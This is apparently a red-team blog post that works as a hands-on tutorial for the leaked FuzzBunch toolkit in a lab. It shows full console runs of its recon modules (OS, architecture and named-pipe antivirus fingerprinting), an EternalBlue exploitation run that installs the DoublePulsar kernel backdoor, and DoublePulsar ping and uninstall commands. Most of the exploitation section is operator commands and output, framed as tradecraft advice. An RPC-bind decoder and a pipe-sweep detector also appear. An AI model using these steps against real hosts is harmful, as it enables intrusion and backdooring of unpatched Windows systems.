Match Made In The Shadows: Part [2]
Intro
At this point of the post, I assume you have set up a full environment from the Part [1] post here. Today we will cover using FuzzBunch (FB) for exploitation, the tradecraft considerations that went into its design, and what that says about the prowess of this actor. As a Red Teamer, I often find that skill lies in the operator and their knowledge of the toolkit rather than in the capability of the tool. This actor refers to this role as a Tool Champion[1] in a few cases.
In this series we are going to cover the following:
- Environment setup and configuration
- Walk through an exploit scenario and tutorial
- Cover tradecraft and the advanced nature of the DanderSpritz agent
- Additional deep dive into components
This post will only cover portion two (2) as the material and setup are dense.
FuzzBunch Touches
Before even considering exploitation, any good operator would do some level of checks, and one of the exciting toolsets packaged inside FB is "Touches". Touch is a suite of tools that allows an operator to run checks against targets as well as pull back data and fingerprint a host. This is the same kind of functionality you may have used inside Metasploit in the past.
SmbTouch (ST)
When dealing with SMB, all cards are on the table for exploitation, it being one of the top targets in a Windows environment. In domain environments with trusted resources, you're going to see port 445 open. ST was built exactly for this scenario.
This tool allows an operator to check the target's OS and pipes, and whether the target is vulnerable to any exploits within FB. One thing to note: if you have ever had to deal with SMB packet analysis, you may be familiar with anonymous sessions. By default, ST uses one to enumerate the host; if credentials that have access to the target happen to be provided, it will be able to authenticate to the host's named pipes. This technique is valid for any host over Win7, since XP was the last version that supported anonymous access to named pipes. Below is example output from my lab machine:
[!] Entering Plugin Context :: Smbtouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136
fb Touch (Smbtouch) > execute
[!] Preparing to Execute Smbtouch
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Configure Plugin Remote Tunnels
Module: Smbtouch
================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
RedirectedTargetIp
RedirectedTargetPort
UsingNbt False
Pipe
Share
Protocol SMB
Credentials Anonymous
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] SMB Touch started
[*] TargetIp 192.168.251.136
[*] TargetPort 445
[*] RedirectedTargetIp (null)
[*] RedirectedTargetPort 0
[*] NetworkTimeout 60
[*] Protocol SMB
[*] Credentials Anonymous
[*] Connecting to target...
[+] Initiated SMB connection
[+] Target OS Version 6.1 build 7601
Windows 7 Enterprise 7601 Service Pack 1
[*] Trying pipes...
[-] spoolss - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] browser - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] lsarpc - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] No pipes accessible
[Not Supported]
ETERNALSYNERGY - Target OS version not supported
[Not Vulnerable]
ETERNALROMANCE - Named pipe required for exploit
ETERNALCHAMPION - Not a browser for unauth, pipe/share required
[Vulnerable]
ETERNALBLUE - DANE
[*] Writing output parameters
[+] Target is vulnerable to 1 exploit
[+] Touch completed successfully
[+] Smbtouch Succeeded
Rpctouch
This module seems to be a meta-module of Smbtouch, allowing an operator to set flags to target architecture, language, and versioning. The architecture check will not work unless you have access to the "Browser" pipe, of course.
fb > use Rpctouch
[!] Entering Plugin Context :: Rpctouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136
fb Touch (Rpctouch) > execute
[!] Preparing to Execute Rpctouch
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445
[+] Configure Plugin Remote Tunnels
Module: Rpctouch
================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
NetBIOSName *SMBSERVER
TouchLanguage False
TouchArchitecture False
Protocol SMB
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] SMB String: Windows 7 Enterprise 7601 Service Pack 1 (WIN7SP1)
[+] Rpctouch Succeeded
ArchTouch (AT)
As shown above, RT enumerates the version. One thing to note is that using this method you will not be able to enumerate the architecture, since you will not have access to the "Browser" pipe[2]. It seems that when connecting to a DCE-RPC endpoint on port 49152, AT sends a crafted packet to BIND to the service. When this takes place, a few transactional structures are passed to optimize performance between the two endpoints, such as the version and the CTX items. This prompts a response from the RPC mapper indicating acceptance or rejection of each CTX item. Due to the nature of this tool, I was inherently curious about how it worked, as I didn't know this was possible to do on a Windows 7 machine.
DCE/RPC Bind call (Req)
When AT sends its first packet, it completes a TCP handshake and sends an RPC Bind request. Packaged in this request are two (2) items of interest: a 32-bit Network Data Representation (NDR) transfer syntax and a 64-bit NDR transfer syntax.
The NDR wire protocol, also referred to as transfer syntax, enables RPC calls to traverse the network. The wire protocol defines the wire representation of an RPC call, such as the order in which data members are marshaled, alignment of data on the wire, additional information included with the data, and other issues.[3]
Below is a HEX+ASCII dump and tree dump from Wireshark, if interested:
0000 05 00 0b 03 10 00 00 00 74 00 00 00 00 00 00 00 ........t.......
0010 d0 16 d0 16 00 00 00 00 02 00 00 00 00 00 01 00 ................
0020 80 bd a8 af 8a 7d c9 11 be f4 08 00 2b 10 29 89 .....}......+.).
0030 01 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 .....]..........
0040 2b 10 48 60 02 00 00 00 01 00 01 00 80 bd a8 af +.H`............
0050 8a 7d c9 11 be f4 08 00 2b 10 29 89 01 00 00 00 .}......+.).....
0060 33 05 71 71 ba be 37 49 83 19 b5 db ef 9c cc 36 3.qq..7I.......6
0070 01 00 00 00 ....
Distributed Computing Environment / Remote Procedure Call (DCE/RPC) Bind, Fragment: Single, FragLen: 116, Call: 0
Version: 5
Version (minor): 0
Packet type: Bind (11)
Packet Flags: 0x03
Data Representation: 10000000 (Order: Little-endian, Char: ASCII, Float: IEEE)
Frag Length: 116
Auth Length: 0
Call ID: 0
Max Xmit Frag: 5840
Max Recv Frag: 5840
Assoc Group: 0x00000000
Num Ctx Items: 2
Ctx Item[1]: Context ID:0, MGMT, 32bit NDR
Context ID: 0
Num Trans Items: 1
Abstract Syntax: MGMT V1.0
Transfer Syntax[1]: 32bit NDR V2
Transfer Syntax: 32bit NDR UUID:8a885d04-1ceb-11c9-9fe8-08002b104860
ver: 2
Ctx Item[2]: Context ID:1, MGMT, 64bit NDR
Context ID: 1
Num Trans Items: 1
Abstract Syntax: MGMT V1.0
Transfer Syntax[1]: 64bit NDR V1
Transfer Syntax: 64bit NDR UUID:71710533-beba-4937-8319-b5dbef9ccc36
ver: 1
DCE/RPC Bind call (Rep)
If the endpoint replies, it sends back the proper NDR to serialize with for optimal performance (from the research I have seen). In this packet are two (2) CTX items.
First being a rejection of one platform:
0000 02 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 00 00 00 00 00 00 00 00 ........
Ctx Item[1]: Provider rejection, PNIO (Implicit Ar)
Ack result: Provider rejection (2)
Ack reason: Proposed transfer syntaxes not supported (2)
Transfer Syntax: PNIO (Implicit Ar)
Syntax ver: 0
The second is the acceptance of the supported provider, denoting the endpoint's target arch. A nifty method I didn't know about; maybe I'm just behind the times haha!
0000 00 00 00 00 33 05 71 71 ba be 37 49 83 19 b5 DB ....3.qq..7I....
0010 ef 9c cc 36 01 00 00 00 ...6....
Ctx Item[2]: Acceptance, 64bit NDR
Ack result: Acceptance (0)
Transfer Syntax: 64bit NDR
Syntax ver: 1
NOTE: NMAP does not have a check for this after some research it seems... hmm
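To make the mechanism concrete, here is an added example (my own code, not FuzzBunch's) that decodes the captured Bind request above and the two ctx result entries of the reply, then applies the same inference AT does: an accepted 64bit NDR context means a 64-bit RPC runtime. The bind_ack header itself is not shown on the page, so only the result list is decoded, and falling back to "x86" when NDR64 is rejected is my assumption.

```python
import struct
import uuid

# Abstract/transfer syntax UUIDs seen in the captured Bind above.
NDR32 = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")
NDR64 = uuid.UUID("71710533-beba-4937-8319-b5dbef9ccc36")
MGMT = uuid.UUID("afa8bd80-7d8a-11c9-bef4-08002b102989")
NAMES = {NDR32: "32bit NDR", NDR64: "64bit NDR", MGMT: "MGMT"}

# Bytes copied from the Wireshark dump in the post (Architouch Bind request, 116 bytes).
BIND_REQUEST = bytes.fromhex(
    "05 00 0b 03 10 00 00 00 74 00 00 00 00 00 00 00 "
    "d0 16 d0 16 00 00 00 00 02 00 00 00 00 00 01 00 "
    "80 bd a8 af 8a 7d c9 11 be f4 08 00 2b 10 29 89 "
    "01 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 "
    "2b 10 48 60 02 00 00 00 01 00 01 00 80 bd a8 af "
    "8a 7d c9 11 be f4 08 00 2b 10 29 89 01 00 00 00 "
    "33 05 71 71 ba be 37 49 83 19 b5 db ef 9c cc 36 "
    "01 00 00 00"
)
# The two p_result_t entries from the bind_ack in the post (24 bytes each).
BIND_ACK_RESULTS = bytes.fromhex(
    "02 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "00 00 00 00 33 05 71 71 ba be 37 49 83 19 b5 db ef 9c cc 36 01 00 00 00"
)


def parse_header(pdu):
    """Common 16-byte DCE/RPC connection-oriented PDU header."""
    vers, vers_minor, ptype, flags = struct.unpack_from("<BBBB", pdu, 0)
    drep = pdu[4:8]  # byte 0 high nibble: 1 = little-endian integers
    frag_len, auth_len, call_id = struct.unpack_from("<HHI", pdu, 8)
    if vers != 5 or frag_len != len(pdu):
        raise ValueError("not a complete DCE/RPC v5 PDU")
    return {"ptype": ptype, "flags": flags, "little_endian": bool(drep[0] & 0x10),
            "frag_len": frag_len, "auth_len": auth_len, "call_id": call_id}


def _syntax(buf, off):
    """p_syntax_id_t: little-endian UUID followed by a u32 version (major in low 16 bits)."""
    sid = uuid.UUID(bytes_le=buf[off:off + 16])
    ver = struct.unpack_from("<I", buf, off + 16)[0]
    return sid, ver & 0xFFFF


def parse_bind(pdu):
    """Decode a Bind (ptype 11) PDU into its presentation context list."""
    hdr = parse_header(pdu)
    if hdr["ptype"] != 11:
        raise ValueError("not a Bind PDU")
    max_xmit, max_recv, assoc = struct.unpack_from("<HHI", pdu, 16)
    n_ctx, off, contexts = pdu[24], 28, []
    for _ in range(n_ctx):
        cont_id, n_ts = struct.unpack_from("<HB", pdu, off)  # + 1 reserved byte
        abstract = _syntax(pdu, off + 4)
        off += 24
        transfer = []
        for _ in range(n_ts):
            transfer.append(_syntax(pdu, off))
            off += 20
        contexts.append({"id": cont_id, "abstract": abstract, "transfer": transfer})
    return {"header": hdr, "max_xmit": max_xmit, "max_recv": max_recv,
            "assoc_group": assoc, "contexts": contexts}


def parse_results(blob):
    """Decode the bind_ack p_result_t list: ack result, reason, negotiated syntax."""
    out = []
    for off in range(0, len(blob), 24):
        result, reason = struct.unpack_from("<HH", blob, off)
        out.append({"result": result, "reason": reason, "syntax": _syntax(blob, off + 4)})
    return out


def infer_arch(results):
    """Architouch's inference: an accepted 64bit NDR context means a 64-bit RPC runtime.
    Treating anything else as x86 is an assumption, not something the post states."""
    for r in results:
        if r["result"] == 0 and r["syntax"][0] == NDR64:
            return "x64"
    return "x86"
```

The same decoder works on a packet capture of port 49152 traffic, which is where a defender would look for unsolicited MGMT binds from hosts that have no business talking RPC to a workstation.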
Finally using this module proves simple:
fb > use Architouch
[!] Entering Plugin Context :: Architouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136
fb Touch (Architouch) > execute
[!] Preparing to Execute Architouch
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [49152] :
[+] (TCP) Local 192.168.251.136:49152
[+] Configure Plugin Remote Tunnels
Module: Architouch
==================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 49152
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting...success
[*] Binding to RPC...success
[+] Target is x64
[+] Touch completed successfully
[+] Architouch Succeeded
Namedpipetouch
One of the major reasons I took the time to write this blog was not to recap the leak of these tools, but to deep dive into the thought process behind the tool usage. We can always learn from others, and NPT is a great example of this. At first glance this module does not provide much insight into the use case for such a tool:
fb > use Namedpipetouch
[!] Entering Plugin Context :: Namedpipetouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136
fb Touch (Namedpipetouch) > execute
[!] Preparing to Execute Namedpipetouch
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445
[+] Configure Plugin Remote Tunnels
Module: Namedpipetouch
======================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
UsingNbt False
PipeList ['\PIPE\browser', '\PIPE\lsarpc', '\PIPE\spoolss',
'\PIPE\360OnAccessGet', '\PIPE\360OnAccessSet', '
\PIPE\aswUpdSv', '\PIPE\afwCallbackPipe2', '\PIPE\
afwCallbackPipe2', '\PIPE\aswUpdSv', '\PIPE\_pspus
er_780_AVGIDSMONITOR.EXE_9d97da47-8de1-4699-b3da-9
eafb262f2a4', '\PIPE\AVG7B14C58C-E30D-11DB-B553-F8
... (plus 47 more lines)
DescList ['OS Pipe: computer browser', 'OS Pipe: lsass rpc'
, 'OS Pipe: print spooler', '360 Safe', '360 Safe'
, 'alwil Avast professional 4.8 Avast Internet Sec
urity v5.0', 'Avast Internet Security 5.0', 'Avast
Internet Security 5.0', 'Avast pro 4.8 or Avast I
S v5.0', 'AVG IS 8.5', 'AVG IS 8.5', 'AVG IS 8.5',
... (plus 35 more lines)
Protocol SMB
PipeList - A hidden gem
Something fascinating I had not thought about (granted, I don't have Eternal* exploits lying around) is the way exploits are most likely deployed. Any exploit developer worth his salt performs some Continuous Integration (CI), and that most likely includes testing against AV. After using this tool in the lab, I hypothesized that an exploit of this stature most likely came with rules or other checks that must be done to ensure they aren't putting it at risk. The dollar value of such a tool has to be extremely high, I would imagine.
Most of the checks turn out to be for AV. That seems to line up with a workflow that would make sense for deploying EternalBlue:
FB -> Smbtouch -> Rpctouch? -> Namedpipelist checks -> EternalBlue
This type of check is invaluable for a Red Team enumerating AV software remotely; in many cases this is otherwise just speculation about an unknown and a risk of operating.
Red Team: are you checking for this? This is an amazing check to add to the toolkit!
Below is the final output denoting the specific pipes found (take note of 2010: an observation on the last update to the pipe list they are checking for?):
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Initializing Connection...
[+] Connection established.
[+] Testing 86 pipes
[+] Testing for OS Pipe: computer browser.
[+] Testing for OS Pipe: lsass rpc
[+] Pipe Found: \PIPE\lsarpc
[+] Testing for OS Pipe: print spooler.
[+] Testing for 360 Safe..
[+] Testing for all Avast professional 4.8 Avast Internet Security v5.0.
[+] Testing for Avast Internet Security 5.0.
[+] Testing for Avast pro 4.8 or Avast IS v5.0.
[+] Testing for AVG IS 8.5.......
[+] Testing for AVG IS 8.5-9.0.
[+] Testing for AVG IS 9.0.646............
[+] Testing for avira antivirus personal edition premium v7.06, avira premium security suite v7.
[+] Testing for avira premium sec suite v8.......
[+] Testing for Avira premium security suite v8.
[+] Testing for BitDefender 2010 v13.
[+] Testing for BitDefender TotalSec 2010 v13.0.11...
[+] Testing for BitDefender TotalSec 2010 v13.0.11 Bit Defender Total Security 2009...
[+] Testing for FSecure 2010...........................
[+] Testing for McAfee 8.7i..
[+] Testing for Norton Internet Security 2010.
[+] Testing for Norton IS 2008.
[+] Testing for Norton360 v4; Norton IS 2009; Norton IS 2010; Norton 360 v4.
[+] Testing for Norton360 v4.
[+] Testing for Outpost Security Suite Pro 2009 v6.5.
[+] Testing for Panda IS 2010 v15....
[+] Testing for Sophos 9.0.
[+] Testing for TrendMicro IS 2010 v17.50.
[+] Testing for VMWare Host.
[*] Summary: 1 pipes found
OS Pipe: lsass rpc - \PIPE\lsarpc
[+] Namedpipetouch Succeeded
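The flip side of the check above is that a Touch-style sweep is loud from the target's point of view: one source opening dozens of distinct IPC$ pipe names in seconds, mostly denied, often as ANONYMOUS LOGON. The following is an added detection example (my own, not from the post or the toolkit) run over constructed events in a simplified, assumed projection of Windows Security event 5145; the window and threshold are assumptions to tune, and the AV pipe names are a subset of the post's PipeList.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Subset of the AV pipe names from the post's PipeList.
AV_PIPES = {"360OnAccessGet", "360OnAccessSet", "aswUpdSv", "afwCallbackPipe2"}


def _ev(ts, src, user, target, denied):
    """Constructed record: source IP, account, share, relative target (pipe name)."""
    return {"ts": ts, "src": src, "user": user, "share": "\\\\*\\IPC$",
            "target": target, "denied": denied}


PROBED = ["browser", "lsarpc", "spoolss", "360OnAccessGet", "360OnAccessSet", "aswUpdSv",
          "afwCallbackPipe2", "srvsvc", "samr", "netlogon", "wkssvc", "epmapper"]

SAMPLE_EVENTS = [  # one anonymous source sweeping 12 pipes in 12 seconds, all denied but one ...
    _ev(f"2017-05-01T10:00:{i:02d}", "192.168.251.10", "ANONYMOUS LOGON", p, p != "lsarpc")
    for i, p in enumerate(PROBED)
] + [  # ... and a domain user touching two pipes minutes apart (benign)
    _ev("2017-05-01T10:03:00", "192.168.251.20", "LAB\\alice", "lsarpc", False),
    _ev("2017-05-01T10:09:30", "192.168.251.20", "LAB\\alice", "spoolss", False),
]


def detect_pipe_sweeps(events, window=timedelta(seconds=60), min_distinct=8):
    """Flag any source that opens at least `min_distinct` different IPC$ pipe names
    inside a sliding `window`; returns one alert per source with the widest burst."""
    by_src = defaultdict(list)
    for e in events:
        if e["share"].upper().endswith("IPC$"):
            by_src[e["src"]].append((datetime.fromisoformat(e["ts"]), e))
    alerts = []
    for src, items in by_src.items():
        items.sort(key=lambda x: x[0])
        best, start = None, 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            burst = [e for _, e in items[start:end + 1]]
            names = {e["target"] for e in burst}
            if len(names) >= min_distinct and (best is None or len(names) > best["distinct_pipes"]):
                best = {"src": src, "distinct_pipes": len(names),
                        "anonymous": any(e["user"] == "ANONYMOUS LOGON" for e in burst),
                        "denied": sum(e["denied"] for e in burst),
                        "av_pipes": sorted(names & AV_PIPES),
                        "first": burst[0]["ts"], "last": burst[-1]["ts"]}
        if best:
            alerts.append(best)
    return alerts
```

Event 5145 is only written when the Audit Detailed File Share subcategory is enabled, so confirm that is on before relying on this signal.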
FuzzBunch Specials
One of the more popular portions of the dump was the mass amount of exploits, many of which are still unpatched on older systems such as XP/2003. While everyone took the time to patch for EB, ESTEEMAUDIT and others are just as viable options on older systems once inside a network.
To keep this blog focused and on the topic, we will only be using EternalBlue and analyzing the setup, prep, execution of EB.
FuzzBunch Internals
We mentioned earlier that FB is an exploitation framework, one that resembles Metasploit. Being modular requires the ability to adopt new exploits, code, etc. An XML file accompanies each exploit and module, listing its required/optional fields.
Analyzing EternalBlue's fields (XML)
A few things to note: there is the ability to launch via a "DaveProxyPort"; at this point I'm speculating this is some kind of redirector, as I have not had time to look deeply into it. Standard options exist:
- Target IP
- Target Port
- Validate Implant
- Validate Target
<inputparameters>
  <parameter hidden="true" type="TcpPort" name="DaveProxyPort" description="DAVE Core/Proxy Hookup connection port">
    <default>0</default>
  </parameter>
<-----------SNIP---------->
  <parameter xdevmap="ETERNALBLUE_DOUBLEPULSAR_PRESENT" type="Boolean" name="DoublePulsarPresent" description="Set to true if the DOUBLEPULSAR backdoor was already installed and the exploit did not have to be thrown" />
</outputparameters>
<redirection>
  <local protocol="TCP" listenaddr="TargetIp" listenport="TargetPort" closeoncompletion="true" destaddr="//identifier" destport="//service[name='SMB']/port" />
Analyzing EternalBlue's Targets (XML)
The first thing of interest is dating the toolset to the best of my ability. It is already known that this exploit affects nearly all platforms of Windows. But what is interesting is that this exploit manifest only shows support up to Windows 7 and Server 2008 R2! We can gain some insight from this, knowing the authors would of course have added support to this tool when new operating systems were released. That dates this tool to around or before Windows 2012, an interesting piece of the puzzle.
<os name="Windows XP" family="windows" architecture="x86 32-bit">
  <bindtovalue name="Target" value="XP" />
</os>
<---------------SNIP-------------->
<os servicepack="1" name="Windows 7" family="windows" architecture="x64 64-bit">
  <bindtovalue name="Target" value="WIN72K8R2" />
</os>
FuzzBunch Explosion Tutorial
One of the exciting aspects of FB is its clear and concise protection against operator mistakes. It's simple yet powerful in the way it always checks with its user before moving forward, and in some cases multiple times. As an example of the prowess of the operators and tools being deployed, it has to be one of the most professional platforms I have ever seen for using exploits and preventing mistakes.
EternalBlue Setup
It's quite easy: all you have to do is use the "use" command to drop into a module. Then if you type "execute" it will walk you through all of the proper settings.
fb > use Eternalblue
[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode:: Eternalblue
Module: Eternalblue
===================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] : no
[!] Skipping Prompt
[!] Preparing to Execute Eternalblue
[*] Mode :: Delivery mechanism
*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH
[?] Mode [0] : 1
[+] Run Mode: FB
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445
[+] Configure Plugin Remote Tunnels
Module: Eternalblue
===================
Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target WIN72K8R2
[?] Execute Plugin? [Yes] :
Eternalblue Throw
Once all settings pass the checks, and you work your way through the above, you will be able to send the exploit. The exploit at a high level does the following:
- Creates an Anonymous SMB session
- Runs correlated "Touch" plugin
- Validates your exploit settings match returned target
- Send initial Exploit buffer
- Creates another Anon SMB session
- Send the last fragment to exploit
- Sends egg / Disconnect
- Checks install of Kernel level backdoor
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (41 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp
0x00000010 72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63 rise 7601 Servic
0x00000020 65 20 50 61 63 6b 20 31 00 e Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
.........DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded
Eternalblue Exploit Methodology
One of the interesting aspects of this exploit is the choice of loader they decided to deploy, which in many cases makes total sense, allowing operators to be fluid and have options under different environmental constraints. A great example, as we introduce DoublePulsar next, is the ability to use this backdoor to execute user-mode code of choice: an obvious benefit of a layered option, reducing the overall implants at risk at any given time in a failed exploit scenario.
DoublePulsar
Man, one of my favorites in this toolkit is the expandability of nearly all the toolsets, as we mentioned earlier. DoublePulsar (DP) does some interesting magic that can be covered in way more detail here.
DoublePulsar Features
To interact with our freshly created Back Door, we can use DP to send different commands and install our next stage of the implant.
DoublePulsar Arch
First select the proper Architecture that we obtained from our EB output in the prior exploit ("[+] Ping returned Target architecture: x64 (64-bit)").
fb > use Doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall
[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [192.168.251.136] :
[*] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :
[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] :
[*] Architecture :: Architecture of the target OS
*0) x86 x86 32-bits
1) x64 x64 64-bits
[?] Architecture [0] : 1
[+] Set Architecture => x64
DoublePulsar Operation
In some cases it would make sense to reverify the architecture and the operation of the implant if you are doing maintenance or just coming back onto an operation that may have been down for a large portion of time. So let's start with a Ping:
[?] Function [0] : 1
[+] Set Function => Ping
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
Protocol SMB
Architecture x64
Function Ping
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x041A927F
SMB Connection string is: Windows 7 Enterprise 7601 Service Pack 1
Target OS is: 7 x64
Target SP is: 1
[+] Backdoor installed
[+] Command completed successfully
[+] Doublepulsar Succeeded
Next, in the case of pulling out of an environment, it even supplies an "Uninstall" function:
fb Payload (Doublepulsar) > set Function Uninstall
[+] Set Function => Uninstall
fb Payload (Doublepulsar) > execute
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
Protocol SMB
Architecture x64
Function Uninstall
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x041A927F
SMB Connection string is: Windows 7 Enterprise 7601 Service Pack 1
Target OS is: 7 x64
Target SP is: 1
[+] Backdoor installed
[.] Sending burn implant message
[+] Backdoor returned code: 10 - Success!
[+] Backdoor killed
[+] Command completed successfully
[+] Doublepulsar Succeeded
Final Thoughts
We really only scratched the surface of the entire series today; the next post will focus on the usage and deployment of code via DP. Cheers. NOTE: Not A IPA